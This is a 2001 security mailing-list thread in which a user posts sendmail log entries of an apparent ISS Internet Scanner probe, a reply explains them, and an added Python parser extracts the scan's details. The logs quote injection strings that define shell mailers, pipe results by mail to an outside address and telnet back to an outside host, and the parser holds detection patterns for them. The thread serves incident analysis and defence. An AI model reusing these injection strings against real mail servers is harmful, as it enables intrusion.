
[cobalt-security] Re: Maybe OT: maillog reports attack; other lists?



Hi Eddie,

This is probably a scan from someone using ISS Internet Scanner against your server. Given that it's a fairly expensive program I doubt it's a script kiddie (unless there are warez of it floating around somewhere), but the source of the scans is fairly obvious in your logs. Basically it's scanning your server for sendmail vulnerabilities, and emailing any it finds back to jimmy@xxxxxxxxxxxxxxxxxx. Given that it's Internet Scanner, I recommend you check your other logs as well since it scans for a whole mess of stuff. Note that it's also attempting to telnet back to this guy's box (the 'telnet 203.87.15.193 5701' part), though for what intention I'm not sure. That IP resolves to: ara-as1-p193.netconnect.net.au. Could be dialup, could be DSL, I dunno.

Unless you want traffic from this network for some reason, you may as well just block all inbound and outbound connections to this guy's system/network (netconnect.net.au) to prevent any more scans or sending of information to him. You may also want to report the scans to his ISP, since his email address is in plain view.

Take care,
Ralph Forsythe
rforsythe@xxxxxxxxxxxxx

At 12:03 PM 12/23/2001 -0800, Eddie Bishop wrote:
From: "Edward Bishop" <eddie@xxxxxxxxxxxxxxxx>
Date: Sat, 22 Dec 2001 23:25:51 -0000
Subject: [cobalt-security] Maybe OT: maillog reports attack; other lists?

I've got four entries in my maillog which I've never seen before and which look terrifying. This is on my non-Cobalt server (RedHat) so I don't know if it's of relevance to this list. If not, apologies - but I'd be grateful for suggestions as to good lists to try, hopefully with people as helpful as on this one.

Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep 2 ; echo quit ) |telnet 203.87.15.193 5701"

Dec 22 15:16:56 ns sendmail[9836]: NOQUEUE: POSSIBLE ATTACK from ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep 2 ; echo quit ) |telnet 203.87.15.193 5701"

Dec 22 15:16:57 ns sendmail[9837]: NOQUEUE: issCrootMprogP/bin/shFlsDFMeuAsh-c$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/echo SendmailIdentdBugVulnera: VRFY 1145130318@ISS

Dec 22 15:16:57 ns sendmail[9838]: NOQUEUE: issCrootMprogP/bin/shFlsDFMeuAsh-c$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/echo SendmailIdentdBugVulnera: VRFY 1145130318@ISS

--
Eddie Bishop
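The maillog entries in this thread, as an added example that is not part of the original posts: a small Python parser for sendmail's "POSSIBLE ATTACK ... newline in string" lines that pulls out the scanning host, the CR-separated lines the client injected into one SMTP argument, the address the probe result is mailed to and the telnet call-back, plus a check for the scanner's "VRFY ...@ISS" probes. The sample lines are constructed from the thread's entries (quoted-printable decoded, the masked address replaced by the placeholder jimmy@example.invalid) and the regexes assume the sendmail log layout shown above.

```python
import re

# Constructed sample lines modelled on the thread's maillog entries (quoted-printable
# decoded, masked address replaced by a placeholder; ^M is sendmail's rendering of CR).
SAMPLE_MAILLOG = [
    'Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from '
    'ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog, '
    'P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c '
    '$u^M R<"|/... Vulnerable | mail jimmy@example.invalid">^M R<"|( sleep 2 ; '
    'echo quit ) |telnet 203.87.15.193 5701"',
    'Dec 22 15:16:57 ns sendmail[9837]: NOQUEUE: issCrootMprogP/bin/shFlsDFMeuAsh-c'
    '$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/echo SendmailIdentdBugVulnera: '
    'VRFY 1145130318@ISS',
    # an ordinary delivery line (constructed) that must not be flagged
    'Dec 22 15:17:02 ns sendmail[9840]: fBMNH2r09840: from=<bob@example.invalid>, '
    'size=1234, class=0, nrcpts=1',
]

ATTACK_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sendmail\[(?P<pid>\d+)\]: '
    r'NOQUEUE: POSSIBLE ATTACK from (?P<src>[^:]+): newline in string "(?P<body>.*)"$')
# "| mail <addr>" ships the probe result out; "telnet <ip> <port>" is the call-back.
MAIL_RE = re.compile(r'\|\s*mail\s+([^\s"|>]+@[^\s"|>]+)')
TELNET_RE = re.compile(r'telnet\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)')
# The scanner's VRFY probes carry an @ISS marker in the argument.
ISS_VRFY_RE = re.compile(r'sendmail\[(\d+)\]: NOQUEUE: .*: VRFY \S+@ISS$')

def parse_possible_attack(line):
    """Return a finding dict for a sendmail 'POSSIBLE ATTACK' line, else None."""
    m = ATTACK_RE.match(line)
    if not m:
        return None
    body = m.group('body')
    # Every ^M is a carriage return the client smuggled into one SMTP argument;
    # splitting on it recovers the sendmail.cf-style lines it tried to define.
    injected = [s.strip() for s in body.split('^M') if s.strip()]
    return {
        'pid': int(m.group('pid')),
        'source': m.group('src'),
        'injected_lines': injected,
        'mail_targets': MAIL_RE.findall(body),
        'callbacks': [(ip, int(port)) for ip, port in TELNET_RE.findall(body)],
    }

def scan_maillog(lines):
    """Collect POSSIBLE ATTACK findings and the pids of ISS-style VRFY probes."""
    findings = [f for f in (parse_possible_attack(ln) for ln in lines) if f]
    probes = [int(m.group(1)) for m in map(ISS_VRFY_RE.search, lines) if m]
    return {'possible_attack': findings, 'iss_vrfy_probes': probes}
```

Running scan_maillog over a real maillog gives the source host to block and the call-back address to report, as the reply above suggests.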